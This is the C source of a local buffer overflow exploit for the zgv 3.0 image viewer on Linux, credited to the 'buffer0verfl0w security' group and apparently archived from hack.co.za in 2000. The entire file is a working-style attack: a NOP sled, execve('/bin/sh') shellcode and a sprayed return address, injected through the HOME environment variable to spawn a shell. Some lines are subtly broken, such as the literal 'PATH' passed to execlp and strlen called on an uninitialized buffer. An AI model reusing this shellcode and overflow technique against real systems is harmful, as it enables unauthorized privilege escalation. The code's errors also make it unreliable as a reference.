/* 
   zgv 3.0 local linux sample exploit
   by slash / buffer0verfl0w security
   <tcsh@b0f.i-p.com> <b0f.freebsd.lublin.pl>

   Initial exploit version by Mixter <mixter@newyorkoffice.com>
*/

#include <stdio.h>
#include <stdlib.h>

#define NOPS 0x90			// No operation instruction
#define BUFLEN 1032		// Our buffer size
#define RETADDR  0xbffff574	// Change this if it doesn't suit Youre needs
#define PATH "/usr/bin/zgv"	// Path to the program

char shellcode[]= // execve("/bin/sh"); 
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main()
{
  char buf[BUFLEN];
  long retaddr = RETADDR;
  int i;

  printf("######################################\n");
  printf("# zgv 3.0 local linux sample exploit #\n");
  printf("# by slash / buffer0verfl0w security #\n");
  printf("######################################\n");
  printf("# Using return address 0x%lx\n",retaddr);
  printf("# Using buffer size %d\n", strlen(buf));

  // Build the overflow string. 
  for (i = 0; i < BUFLEN; i += 4)
  *(long *) &buf[i] = retaddr;

  // Copy the NOPS in to the buffer leaving space for 
  // the shellcode.
  memset(buf, NOPS, BUFLEN - strlen(shellcode) - 100); 

  // Copy the shellcode into the buffer.
  memcpy(buf + (BUFLEN - strlen(shellcode) - 100), shellcode, strlen(shellcode));
  setenv("HOME", buf, 1);

  // Execute the program
  execlp("PATH", "zgv", 0);
  return 0;
}
/*                   www.hack.co.za   [5 September 2000]*/